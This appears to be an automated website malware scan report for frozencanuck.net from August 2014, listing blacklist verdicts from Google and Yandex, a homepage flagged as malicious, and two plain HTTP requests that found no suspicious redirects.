Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=frozencanuck.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://frozencanuck.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://frozencanuck.net/ | 200 OK Content-Length: 2970 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://frozencanuck.net/test404page.js | 404 Not Found Content-Length: 595 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: frozencanuck.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 19 Aug 2014 10:50:26 GMT
Accept-Ranges: bytes
ETag: "2a84829-b9a-4586af9a59a40"
Server: Apache
Content-Length: 2970
Content-Type: text/html
Last-Modified: Sat, 04 Oct 2008 10:33:05 GMT
...2970 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: frozencanuck.net
Referer: http://www.google.com/search?q=frozencanuck.net
Result:
The result is similar to the first query. There are no suspicious redirects found.